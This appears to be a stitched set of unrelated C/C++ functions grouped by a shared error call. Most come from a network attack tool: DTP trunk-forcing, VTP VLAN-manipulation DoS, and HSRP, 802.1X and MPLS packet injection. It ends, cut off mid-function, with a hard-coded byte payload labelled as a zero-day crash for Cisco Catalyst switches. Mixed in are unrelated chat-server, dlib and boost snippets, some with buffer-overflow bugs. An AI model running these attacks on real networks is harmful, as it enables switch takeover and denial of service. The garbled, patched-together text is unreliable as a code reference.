/* * We arrived here due to normal termination * from thread tty peer main routine... * Release resources and delete acquired terminal... */ void th_tty_peer_exit(struct term_node *term_node) { dlist_t *p; struct interface_data *iface_data; if (term_node) { for (p = term_node->used_ints->list; p; p = dlist_next(term_node->used_ints->list, p)) { iface_data = (struct interface_data *) dlist_data(p); interfaces_disable(iface_data->ifname); } attack_kill_th(term_node,ALL_ATTACK_THREADS); if (pthread_mutex_lock(&terms->mutex) != 0) thread_error("th_tty_peer pthread_mutex_lock",errno); term_delete_node(term_node, NOKILL_THREAD); if (pthread_mutex_unlock(&terms->mutex) != 0) thread_error("th_tty_peer pthread_mutex_unlock",errno); } write_log(0,"\n th_tty_peer %d finished...\n",(int)pthread_self()); terms->work_state = STOPPED; pthread_exit(NULL); }
int8_t attack_init_params(struct term_node *node, struct attack_param *param, u_int8_t nparams) { u_int8_t i, j, a; for (i=0; i < nparams; i++) { if ( (param[i].value = calloc(1, param[i].size) ) == NULL) { thread_error("attack_init_parameter calloc",errno); for (a=0; a<i; a++) free(param[a].value); return -1; } } if (node->type == TERM_CON) { for (j=0; j < nparams; j++) { if ( (param[j].print = calloc(1, param[j].size_print+1) ) == NULL) { thread_error("attack_init_parameter calloc",errno); for (a=0; a<j; a++) free(param[a].print); for (a=0; a<i; a++) free(param[a].value); return -1; } } } return 0; }
void addclient(int socket) { int i, n; pthread_mutex_lock(&client_mutex); threadcount++; if (threadcount > MAX_CLIENT_COUNT) { n = write(socket, SERVER_FULL, SERVER_FULL_LEN); if (n < 0) { pthread_mutex_unlock(&client_mutex); thread_error(socket, "ERROR in write"); } printf("Waiting for other client handler threads to finish\n"); pthread_cond_wait(&max_condition, &client_mutex); printf("Waiting for other threads done\n"); } for (i = 0; i < MAX_CLIENT_COUNT; ++i) { if (clients[i].initialized == 0) { clients[i].initialized = 1; clients[i].sockfd = socket; clients[i].user = NULL; break; } } printf("add client: client count %d\n", threadcount); pthread_mutex_unlock(&client_mutex); }
void dtp_th_send( void *arg ) { struct attacks *attacks = (struct attacks *)arg; struct dtp_data *dtp_data; sigset_t mask; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); dtp_data = attacks->data; dtp_data->dom_len = strlen(dtp_data->domain); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("dtp_th_send pthread_sigmask()",errno); dtp_th_send_exit(attacks); } dtp_send(attacks); dtp_th_send_exit(attacks); }
/* * Inicializa la estructura que se usa para relacionar el tmp_data * de cada nodo con los datos que se sacaran por pantalla cuando * se accede al demonio de red. * Teoricamente esta funcion solo se llama desde term_add_node() * la cual, a su vez, solo es llamada al tener el mutex bloqueado por * lo que no veo necesario que sea reentrante. (Fredy). */ int8_t dtp_init_comms_struct(struct term_node *node) { struct dtp_data *dtp_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(dtp_comm_params)); if (comm_param == NULL) { thread_error("dtp_init_commands_struct calloc error",errno); return -1; } dtp_data = node->protocol[PROTO_DTP].tmp_data; node->protocol[PROTO_DTP].commands_param = comm_param; comm_param[DTP_SMAC] = &dtp_data->mac_source; comm_param[DTP_DMAC] = &dtp_data->mac_dest; comm_param[DTP_VERSION] = &dtp_data->version; comm_param[DTP_NEIGH] = &dtp_data->neighbor; comm_param[DTP_STATUS] = &dtp_data->status; comm_param[DTP_TYPE] = &dtp_data->type; comm_param[DTP_DOMAIN] = &dtp_data->domain; comm_param[7] = NULL; comm_param[8] = NULL; return 0; }
void addusernick(int socket, const char* nick) { int i; pthread_mutex_lock(&client_mutex); for (i = 0; i < MAX_CLIENT_COUNT; ++i) { if (clients[i].initialized == 1 && clients[i].sockfd == socket) { if (clients[i].user != NULL) free(clients[i].user); clients[i].user = malloc(strlen(nick)); if (clients[i].user == NULL) { pthread_mutex_unlock(&client_mutex); thread_error(socket, "Out of memory"); } printf("Add user %s\n", nick); strcpy(clients[i].user, nick); break; } } pthread_mutex_unlock(&client_mutex); }
void gtk_c_attacks_launch(GtkWidget *button, gpointer userdata) { struct gtk_s_helper *helper; GtkWidget *attacksdialog; GtkWidget *attackparamsdialog; helper = (struct gtk_s_helper *)userdata; attacksdialog = lookup_widget(GTK_WIDGET(button), "attacksdialog"); if ((helper->attack) && (helper->attack->nparams)) { if ((helper->attack_param = calloc(1, (sizeof(struct attack_param) * helper->attack->nparams))) == NULL) { thread_error(" ncurses_i_attack_screen attack_param calloc",errno); return; } memcpy(helper->attack_param, (void *)(helper->attack->param), sizeof(struct attack_param) * helper->attack->nparams); if (attack_init_params(helper->node, helper->attack_param, helper->attack->nparams) < 0) { free(helper->attack_param); return; } attackparamsdialog = gtk_i_create_attackparamsdialog(helper, helper->attack_param, helper->attack->nparams); gtk_widget_show(attackparamsdialog); } else { if (attack_launch(helper->node, helper->mode, helper->row, NULL, 0) < 0) write_log(0, "Error launching attack %d", helper->row); } gtk_widget_destroy(attacksdialog); }
/* * Inicializa la estructura que se usa para relacionar el tmp_data * de cada nodo con los datos que se sacaran por pantalla cuando * se accede al demonio de red. * Teoricamente como esta funcion solo se llama desde term_add_node() * la cual, a su vez, solo es llamada al tener el mutex bloqueado por * lo que no veo necesario que sea reentrante. (Fredy). */ int8_t dot1x_init_comms_struct(struct term_node *node) { struct dot1x_data *dot1x_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(dot1x_comm_params)); if (comm_param == NULL) { thread_error("dot1x_init_commands_struct calloc error",errno); return -1; } dot1x_data = node->protocol[PROTO_DOT1X].tmp_data; node->protocol[PROTO_DOT1X].commands_param = comm_param; comm_param[DOT1X_SMAC] = &dot1x_data->mac_source; comm_param[DOT1X_DMAC] = &dot1x_data->mac_dest; comm_param[DOT1X_VER] = &dot1x_data->version; comm_param[DOT1X_TYPE] = &dot1x_data->type; comm_param[DOT1X_EAP_CODE] = &dot1x_data->eap_code; comm_param[DOT1X_EAP_ID] = &dot1x_data->eap_id; comm_param[DOT1X_EAP_TYPE] = &dot1x_data->eap_type; comm_param[DOT1X_EAP_INFO] = &dot1x_data->eap_info; comm_param[8] = NULL; comm_param[9] = NULL; return 0; }
void hsrp_th_send_raw( void *arg ) { struct attacks *attacks = (struct attacks *)arg; struct hsrp_data *hsrp_data; sigset_t mask; u_int32_t lbl32; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("hsrp_send_discover pthread_sigmask()",errno); hsrp_th_send_raw_exit(attacks); } hsrp_data = attacks->data; /* libnet fix */ lbl32 = htonl(hsrp_data->sip); memcpy((void *)&hsrp_data->sip, &lbl32, 4); lbl32 = htonl(hsrp_data->dip); memcpy((void *)&hsrp_data->dip, &lbl32, 4); hsrp_send_packet(attacks); hsrp_th_send_raw_exit(attacks); }
void vtp_th_send(void *arg) { struct attacks *attacks=NULL; struct vtp_data *vtp_data; sigset_t mask; attacks = arg; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); vtp_data = attacks->data; vtp_data->dom_len = strlen(vtp_data->domain); write_log(0,"\n\nvtp_th_send domain=%s dom_len=%d\n\n",vtp_data->domain,vtp_data->dom_len); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("vtp_th_send pthread_sigmask()",errno); vtp_th_send_exit(attacks); } vtp_send(attacks); vtp_th_send_exit(attacks); }
void threaded_object:: restart ( ) { auto_mutex M(m_); DLIB_ASSERT(id1 != get_thread_id() || id_valid == false, "\tvoid threaded_object::restart()" << "\n\tYou can NOT call this function from the thread that executes threaded_object::thread" << "\n\tthis: " << this ); if (is_alive_ == false) { if (create_new_thread<threaded_object,&threaded_object::thread_helper>(*this) == false) { is_running_ = false; throw thread_error(); } should_respawn_ = false; } else { should_respawn_ = true; } is_alive_ = true; is_running_ = true; should_stop_ = false; s.broadcast(); }
void Message::operator()() { if ( num % 5 == 0) { // int j = 1 / (i % 5); throw boost::enable_current_exception(thread_error()) << thread_info("Whazzup?"); } else { Logger::log(info, str()); } }
/* * Finish the log file. */ void finish_log(void) { time_t this_time; this_time = time(NULL); write_log(0,"# %s finished on %s\n",PACKAGE, ctime(&this_time)); fflush(tty_tmp->log_file); if (fclose(tty_tmp->log_file) < 0) thread_error("Error in fclose", errno); }
/* * Generate the MD5 hash for a VTP Summary-Advert packet */ int8_t vtp_generate_md5(char *secret, u_int32_t updater, u_int32_t revision, char *domain, u_int8_t dom_len, u_int8_t *vlans, u_int16_t vlans_len, u_int8_t *md5, u_int8_t version) { u_int8_t *data, md5_secret[16]; struct vtp_summary *vtp_summ; /* Space for the data (MD5+SUMM_ADVERT+VLANS+MD5)...*/ if ( (data = calloc(1, (16+sizeof(struct vtp_summary)+vlans_len+16))) == NULL) { thread_error("vtp_generate_md5 calloc()",errno); return -1; } /* Do MD5 secret...*/ if (secret) md5_sum(data, strlen(secret), md5_secret); vtp_summ = (struct vtp_summary *)(data+16); write_log(0,"Se calcula MD5 con version=%d\n",version); vtp_summ->version = version; vtp_summ->code = 0x01; if (dom_len > VTP_DOMAIN_SIZE) { vtp_summ->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_summ->domain,domain,VTP_DOMAIN_SIZE); } else { vtp_summ->dom_len = dom_len; memcpy(vtp_summ->domain,domain,dom_len); } vtp_summ->updater = htonl(updater); vtp_summ->revision = htonl(revision); if (vlans_len) memcpy((void *)(vtp_summ+1),vlans,vlans_len); if (secret) memcpy((void *)(data+16+sizeof(struct vtp_summary)+vlans_len),md5_secret,16); md5_sum(data, (32+sizeof(struct vtp_summary)+vlans_len), md5); free(data); return 0; }
void sendmessagefrom(int socket, const char* message) { int i, n; char buffer[512]; if (message == NULL) { printf("send message NULL!\n"); return; } pthread_mutex_lock(&client_mutex); for (i = 0; i < MAX_CLIENT_COUNT; ++i) { if (clients[i].initialized == 1 && clients[i].sockfd == socket) { memset(buffer, 0, 512); strcat(buffer, "["); if (clients[i].user != NULL) strcat(buffer, clients[i].user); strcat(buffer, "]"); strcat(buffer, message); } } if (strlen(buffer) > 0) { for (i = 0; i < MAX_CLIENT_COUNT; ++i) { if (clients[i].initialized == 1 && clients[i].sockfd != socket) { n = write(clients[i].sockfd, buffer, strlen(buffer)); if (n < 0) { pthread_mutex_unlock(&client_mutex); thread_error(clients[i].sockfd, "ERROR writing to socket"); } } } } pthread_mutex_unlock(&client_mutex); }
void dot1x_th_send( void *arg ) { struct attacks *attacks = (struct attacks *)arg; sigset_t mask; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("dot1x_th_send pthread_sigmask()",errno); dot1x_th_send_exit(attacks); } dot1x_send(attacks); dot1x_th_send_exit(attacks); }
void multithreaded_object:: start ( ) { auto_mutex M(m); const unsigned long num_threads_registered = dead_threads.size() + thread_ids.size(); // start any dead threads for (unsigned long i = threads_started; i < num_threads_registered; ++i) { if (create_new_thread<multithreaded_object,&multithreaded_object::thread_helper>(*this) == false) { should_stop_ = true; is_running_ = false; throw thread_error(); } ++threads_started; } is_running_ = true; should_stop_ = false; s.broadcast(); }
/* * Inicializa la estructura que se usa para relacionar el tmp_data * de cada nodo con los datos que se sacaran por pantalla cuando * se accede al demonio de red. * Teoricamente como esta funcion solo se llama desde term_add_node() * la cual, a su vez, solo es llamada al tener el mutex bloqueado por * lo que no veo necesario que sea reentrante. (Fredy). */ int8_t hsrp_init_comms_struct(struct term_node *node) { struct hsrp_data *hsrp_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(hsrp_comm_params)); if (comm_param == NULL) { thread_error("hsrp_init_commands_struct calloc error",errno); return -1; } hsrp_data = node->protocol[PROTO_HSRP].tmp_data; node->protocol[PROTO_HSRP].commands_param = comm_param; comm_param[HSRP_SMAC] = &hsrp_data->mac_source; comm_param[HSRP_DMAC] = &hsrp_data->mac_dest; comm_param[HSRP_SIP] = &hsrp_data->sip; comm_param[HSRP_DIP] = &hsrp_data->dip; comm_param[HSRP_SPORT] = &hsrp_data->sport; comm_param[HSRP_DPORT] = &hsrp_data->dport; comm_param[HSRP_VER] = &hsrp_data->version; comm_param[HSRP_OPCODE] = &hsrp_data->opcode; comm_param[HSRP_STATE] = &hsrp_data->state; comm_param[HSRP_HELLO_TIME] = &hsrp_data->hello_time; comm_param[HSRP_HOLD_TIME] = &hsrp_data->hold_time; comm_param[HSRP_PRIORITY] = &hsrp_data->priority; comm_param[HSRP_GROUP] = &hsrp_data->group; comm_param[HSRP_RESERVED] = &hsrp_data->reserved; comm_param[HSRP_AUTHDATA] = &hsrp_data->authdata; comm_param[HSRP_VIRTUALIP] = &hsrp_data->virtual_ip; comm_param[16] = NULL; comm_param[17] = NULL; return 0; }
int8_t mpls_init_comms_struct(struct term_node *node) { struct mpls_data *mpls_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(mpls_comm_params)); if (comm_param == NULL) { thread_error("mpls_init_comms_struct calloc error",errno); return -1; } mpls_data = node->protocol[PROTO_MPLS].tmp_data; node->protocol[PROTO_MPLS].commands_param = comm_param; comm_param[MPLS_SMAC] = &mpls_data->mac_source; comm_param[MPLS_DMAC] = &mpls_data->mac_dest; comm_param[MPLS_LABEL1] = &mpls_data->label1; comm_param[MPLS_EXP1] = &mpls_data->exp1; comm_param[MPLS_BOTTOM1] = &mpls_data->bottom1; comm_param[MPLS_TTL1] = &mpls_data->ttl1; comm_param[MPLS_LABEL2] = &mpls_data->label2; comm_param[MPLS_EXP2] = &mpls_data->exp2; comm_param[MPLS_BOTTOM2] = &mpls_data->bottom2; comm_param[MPLS_TTL2] = &mpls_data->ttl2; comm_param[MPLS_SRC_IP] = &mpls_data->src_ip; comm_param[MPLS_SRC_PORT] = &mpls_data->src_port; comm_param[MPLS_DST_IP] = &mpls_data->dst_ip; comm_param[MPLS_DST_PORT] = &mpls_data->dst_port; comm_param[MPLS_PAYLOAD] = &mpls_data->ip_payload; comm_param[15] = NULL; comm_param[16] = NULL; return 0; }
/* * Inicializa la estructura que se usa para relacionar el tmp_data * de cada nodo con los datos que se sacaran por pantalla cuando * se accede al demonio de red. * Teoricamente como esta funcion solo se llama desde term_add_node() * la cual, a su vez, solo es llamada al tener el mutex bloqueado por * lo que no veo necesario que sea reentrante. (Fredy). */ int8_t vtp_init_comms_struct(struct term_node *node) { struct vtp_data *vtp_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(vtp_comm_params)); if (comm_param == NULL) { thread_error("vtp_init_commands_struct calloc error",errno); return -1; } vtp_data = node->protocol[PROTO_VTP].tmp_data; node->protocol[PROTO_VTP].commands_param = comm_param; comm_param[VTP_SMAC] = &vtp_data->mac_source; comm_param[VTP_DMAC] = &vtp_data->mac_dest; comm_param[VTP_VERSION] = &vtp_data->version; comm_param[VTP_CODE] = &vtp_data->code; comm_param[VTP_DOMAIN] = &vtp_data->domain; comm_param[VTP_MD5] = &vtp_data->md5; comm_param[VTP_UPDATER] = &vtp_data->updater; comm_param[VTP_REVISION] = &vtp_data->revision; comm_param[VTP_TIMESTAMP] = &vtp_data->timestamp; comm_param[VTP_STARTVAL] = &vtp_data->start_val; comm_param[VTP_FOLLOWERS] = &vtp_data->followers; comm_param[VTP_SEQ] = &vtp_data->seq; comm_param[12] = NULL; comm_param[13] = NULL; comm_param[VTP_VLAN] = &vtp_data->options; return 0; }
/* * Add 1 VTP vlan */ void vtp_th_dos_add(void *arg) { struct attacks *attacks=NULL; sigset_t mask; attacks = arg; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("vtp_th_dos_del pthread_sigmask()",errno); vtp_th_dos_add_exit(attacks); } vtp_modify_vlan(VTP_VLAN_ADD,attacks); vtp_th_dos_add_exit(attacks); }
/* Launch choosed attack... */ int8_t attack_launch(struct term_node *node, u_int16_t proto, u_int16_t attack, struct attack_param *attack_params, u_int8_t nparams) { u_int16_t i = 0; dlist_t *p; void *value1, *value2; while (i < MAX_THREAD_ATTACK) { if (node->protocol[proto].attacks[i].up == 0) { node->protocol[proto].attacks[i].up = 1; node->protocol[proto].attacks[i].mac_spoofing = node->mac_spoofing; node->protocol[proto].attacks[i].attack = attack; node->protocol[proto].attacks[i].params = attack_params; node->protocol[proto].attacks[i].nparams = nparams; /* FIXME: temporal hasta ponerlo bien, pillamos para el ataque las interfaces del usuario */ node->protocol[proto].attacks[i].used_ints = (list_t *) calloc(1, sizeof(list_t)); for (p = node->used_ints->list; p; p = dlist_next(node->used_ints->list, p)) { value1 = dlist_data(p); value2 = (void *) calloc(1, sizeof(struct interface_data)); memcpy((void *)value2, (void *)value1, sizeof(struct interface_data)); node->protocol[proto].attacks[i].used_ints->list = dlist_append(node->protocol[proto].attacks[i].used_ints->list, value2); } node->protocol[proto].attacks[i].used_ints->cmp = interfaces_compare; if ((node->protocol[proto].attacks[i].data = calloc(1, protocols[proto].size )) == NULL) { thread_error("attack_launch calloc",errno); node->protocol[proto].attacks[i].params = NULL; node->protocol[proto].attacks[i].nparams = 0; node->protocol[proto].attacks[i].up = 0; return -1; } memcpy(node->protocol[proto].attacks[i].data, node->protocol[proto].tmp_data, protocols[proto].size ); if (pthread_mutex_init(&node->protocol[proto].attacks[i].attack_th.finished, NULL) != 0) { thread_error("attack_launch pthread_mutex_init mutex", errno); free(node->protocol[proto].attacks[i].data); return -1; } if (pthread_mutex_init(&node->protocol[proto].attacks[i].helper_th.finished, NULL) != 0) { thread_error("attack_launch pthread_mutex_init mutex", errno); free(node->protocol[proto].attacks[i].data); return -1; } if (thread_create(&node->protocol[proto].attacks[i].attack_th.id, (*protocols[proto].attacks[attack].attack_th_launch), &node->protocol[proto].attacks[i]) < 0) { free(node->protocol[proto].attacks[i].data); node->protocol[proto].attacks[i].params = NULL; node->protocol[proto].attacks[i].nparams = 0; node->protocol[proto].attacks[i].up = 0; return -1; } write_log(0, " attack_launch: %d Attack thread %ld is born!!\n", (int)pthread_self(), (u_long) node->protocol[proto].attacks[i].attack_th.id); return 0; } i++; } /* while...*/ return -1; }
void* handle_client(void* fd) { int n; int oldtype; int clientfd; int nickLen; char buffer[256]; char *token; char usernick[256]; clientfd = (*(int*)fd); nickLen = 0; n = pthread_setcanceltype(PTHREAD_CANCEL_DEFERRED, &oldtype); if (n < 0) thread_error(clientfd, "ERROR in setcanceltype"); addclientthread(clientfd, (pthread_t*)pthread_self()); sendusercount(clientfd); while (1) { printf("handle client %d\n", clientfd); memset(buffer, 0, 256); n = read(clientfd, buffer, 255); if (n <= 0) { thread_error(clientfd, "Client disconnected"); } if (nickLen == 0) { token = strtok(buffer, " "); if (token == NULL) thread_error(clientfd, "ERROR client protocol"); if (strcmp(token, USER) == 0) { token = strtok(NULL, " "); if (token == NULL) thread_error(clientfd, "ERROR reading client message"); nickLen = strlen(token); if (nickLen > 0 && nickLen <= 256) { strcpy(usernick, (const char*)token); addusernick(clientfd, (const char*)&usernick); } else { n = write(clientfd, ERROR, ERROR_LEN); } if (n < 0) { thread_error(clientfd, "ERROR writing to socket"); } } } else { sendmessagefrom(clientfd, buffer); } } removeclient(clientfd); pthread_exit(NULL); }
/* * David, pon algo coherente!!! */ void doloop(struct term_node *node, int mode) { struct term_tty *term_tty; struct attack *theattack = NULL; struct timeval timeout; fd_set read_set; int ret, fail; struct termios old_term, term; term_tty = node->specific; theattack = protocols[mode].attacks; if (term_tty->attack >= 0) { if (theattack[term_tty->attack].nparams) { printf("\n<*> Ouch!! At the moment the command line interface doesn't support attacks <*>\n"); printf("<*> that needs parameters and the one you've choosed needs %d <*>\n", theattack[term_tty->attack].nparams); } else { printf("<*> Starting %s attack %s...\n", (theattack[term_tty->attack].type)?"DOS":"NONDOS", theattack[term_tty->attack].s); if (attack_launch(node, mode, term_tty->attack, NULL, 0) < 0) write_log(1, "Error launching attack %d (mode %d)!!\n", term_tty->attack, mode); fflush(stdin); fflush(stdout); setvbuf(stdout, NULL, _IONBF, 0); tcgetattr(0,&old_term); tcgetattr(0,&term); term.c_cc[VMIN] = 1; term.c_cc[VTIME] = _POSIX_VDISABLE; term.c_lflag &= ~ICANON; term.c_lflag &= ~ECHO; tcsetattr(0,TCSANOW,&term); if (theattack[term_tty->attack].single == CONTINOUS) { printf("<*> Press any key to stop the attack <*>\n"); fail = 0; while(!fail && !node->thread.stop) { FD_ZERO(&read_set); FD_SET(0, &read_set); timeout.tv_sec = 0; timeout.tv_usec = 200000; if ( (ret=select(1, &read_set, NULL, NULL, &timeout) ) == -1 ) { thread_error("network_peer_th select()",errno); continue; } if ( !ret ) /* Timeout, decrement timers... */ continue; else { if (FD_ISSET(0, &read_set)) { getchar(); fail = 1; } } } } else /* Command line, only one attack (0), let's wait for its conclusion... */ while (node->protocol[mode].attacks[0].up) thread_usleep(150000); tcsetattr(0,TCSANOW, &old_term); } } /* if term_tty->attack */ }
/* * Uptime thread... */ void * th_uptime(void *arg) { int ret,n; struct timeval timeout; sigset_t mask; write_log(0,"\n th_uptime thread = %d\n",(int)pthread_self()); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("th_uptime pthread_sigmask()",errno); th_uptime_exit(); } if (pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, NULL)) { thread_error("th_uptime pthread_setcancelstate()",errno); th_uptime_exit(); } pthread_cleanup_push( &th_uptime_clean, (void *)NULL ); if (pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, NULL)) { thread_error("th_uptime pthread_setcancelstate()",errno); th_uptime_exit(); } if (pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS, NULL)) { n=errno; pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, NULL); thread_error("th_uptime pthread_setcanceltype()",n); th_uptime_exit(); } while(1) { timeout.tv_sec = 1; timeout.tv_usec = 0; if ( (ret=select( 0, NULL, NULL, NULL, &timeout ) ) == -1 ) { n=errno; thread_error("th_uptime select()",n); continue; } if ( !ret ) /* Timeout, update uptime... */ uptime++; } pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, NULL); pthread_cleanup_pop(0); return (NULL); }
int8_t dtp_send(struct attacks *attacks) { libnet_ptag_t t; libnet_t *lhandler; u_int32_t dtp_len, sent; struct dtp_data *dtp_data; u_int8_t *dtp_packet, *aux; u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x04 }; dlist_t *p; struct interface_data *iface_data; struct interface_data *iface_data2; dtp_data = attacks->data; dtp_len = sizeof(cisco_data)+dtp_data->dom_len+26; dtp_packet = calloc(1,dtp_len); if (dtp_packet == NULL) { thread_error("dtp_send calloc error",errno); return -1; } aux = dtp_packet; memcpy(dtp_packet,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); *aux = dtp_data->version; aux++; aux++; *aux = DTP_TYPE_DOMAIN; aux++; aux++; *aux = dtp_data->dom_len+5; aux++; memcpy(aux,dtp_data->domain,dtp_data->dom_len); aux+=dtp_data->dom_len; aux++; aux++; *aux = DTP_TYPE_STATUS; aux++; aux++; *aux = 0x05; aux++; *aux = dtp_data->status; aux++; aux++; *aux = DTP_TYPE_TYPE; aux++; aux++; *aux = 0x05; aux++; *aux = dtp_data->type; aux++; aux++; *aux = DTP_TYPE_NEIGHBOR; aux++; aux++; *aux = 0x0a; aux++; memcpy(aux,dtp_data->neighbor,ETHER_ADDR_LEN); for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) { iface_data = (struct interface_data *) dlist_data(p); lhandler = iface_data->libnet_handler; t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ dtp_packet, /* payload */ dtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ if (t == -1) { thread_libnet_error("Can't build ethernet header",lhandler); libnet_clear_packet(lhandler); free(dtp_packet); return -1; } t = libnet_build_802_3( dtp_data->mac_dest, /* ethernet destination */ (attacks->mac_spoofing) ? dtp_data->mac_source : iface_data->etheraddr, /* ethernet source */ LIBNET_802_2_H + dtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ if (t == -1) { thread_libnet_error("Can't build ethernet header",lhandler); libnet_clear_packet(lhandler); free(dtp_packet); return -1; } /* * Write it to the wire. */ sent = libnet_write(lhandler); if (sent == -1) { thread_libnet_error("libnet_write error", lhandler); libnet_clear_packet(lhandler); free(dtp_packet); return -1; } libnet_clear_packet(lhandler); protocols[PROTO_DTP].packets_out++; iface_data2 = interfaces_get_struct(iface_data->ifname); iface_data2->packets_out[PROTO_DTP]++; } free(dtp_packet); return 0; }
void dtp_th_nondos_do_trunk( void *arg ) { struct attacks *attacks = (struct attacks *)arg; struct dtp_data *dtp_data, dtp_data_learned; struct pcap_pkthdr header; struct pcap_data pcap_aux; struct libnet_802_3_hdr *ether; struct timeval now; u_int8_t *packet; sigset_t mask; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("dtp_nondos_do_trunk pthread_sigmask()",errno); dtp_th_nondos_do_trunk_exit(attacks); } dtp_data = attacks->data; gettimeofday(&now,NULL); header.ts.tv_sec = now.tv_sec; header.ts.tv_usec = now.tv_usec; /* If you want to test the NULL domain just set the defaults DTP packet values */ /* and comment the following lines. (and recompile)*/ /* From here... if (dtp_learn_packet(ALL_INTS,&attacks->attack_th.stop, &dtp_data_learned, &header) < 0) dtp_th_nondos_do_trunk_exit(attacks); memcpy(dtp_data->mac_dest, dtp_data_learned.mac_dest,6); memcpy(dtp_data->domain,(void *)dtp_data_learned.domain, dtp_data_learned.dom_len); dtp_data->version = dtp_data_learned.version; dtp_data->dom_len = dtp_data_learned.dom_len; dtp_data->status = dtp_data_learned.status; dtp_data->type = dtp_data_learned.type; ... to here. */ packet = (u_int8_t *)calloc( 1, SNAPLEN ); if ( ! packet ) dtp_th_nondos_do_trunk_exit(attacks); dtp_send(attacks); thread_usleep(999999); dtp_send(attacks); thread_usleep(999999); if ( !attacks->attack_th.stop ) { dtp_send(attacks); if ( ! thread_create( &attacks->helper_th, &dtp_send_negotiate, attacks ) ) { while ( ! attacks->attack_th.stop ) { interfaces_get_packet( attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet, PROTO_DTP, NO_TIMEOUT ); if ( ! attacks->attack_th.stop ) { ether = (struct libnet_802_3_hdr *) packet; if (!memcmp(dtp_data->mac_source,ether->_802_3_shost,6) ) continue; /* Oops!! Its our packet... */ pcap_aux.header = &header; pcap_aux.packet = packet; if ( dtp_load_values( &pcap_aux, &dtp_data_learned ) < 0) continue; switch( dtp_data_learned.status & 0xF0 ) { case DTP_TRUNK: dtp_data->status = (DTP_TRUNK | DTP_DESIRABLE); break; case DTP_ACCESS: dtp_data->status = (DTP_ACCESS | DTP_DESIRABLE); break; } } } } else write_log( 0, "dtp_th_nondos_do_trunk thread_create error\n" ); } free(packet); dtp_th_nondos_do_trunk_exit(attacks); }
/* * Zero day crashing Catalyst!! */ void vtp_th_dos_crash(void *arg) { struct attacks *attacks=NULL; struct vtp_data *vtp_data, vtp_data_learned; struct pcap_pkthdr header; struct pcap_data pcap_aux; struct libnet_802_3_hdr *ether; struct timeval now; u_int8_t *packet=NULL, *cursor; sigset_t mask; /* Cisco vlans for crashing */ u_int8_t vlan_cisco[]={ 0x75, 0x00, 0x01, 0x07, 0x20, 0x00, 0x02, 0x0c, 0x03, 0xea, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8a, 0x66, 0x64, 0x64, 0x69, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x01, 0x01, 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x28, 0x00, 0x03, 0x12, 0x03, 0xeb, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8b, 0x74, 0x6f, 0x6b, 0x65, 0x6e, 0x2d, 0x72, 0x69, 0x6e, 0x67, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x24, 0x00, 0x04, 0x0f, 0x03, 0xec, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8c, 0x66, 0x64, 0x64, 0x69, 0x6e, 0x65, 0x74, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00, 0x02, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x01, 0x24, 0x00, 0x05, 0x0d, 0x03, 0xed, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8d, 0x74, 0x72, 0x6e, 0x65, 0x74, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x20 }; sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("vtp_th_dos_del_all pthread_sigmask()",errno); 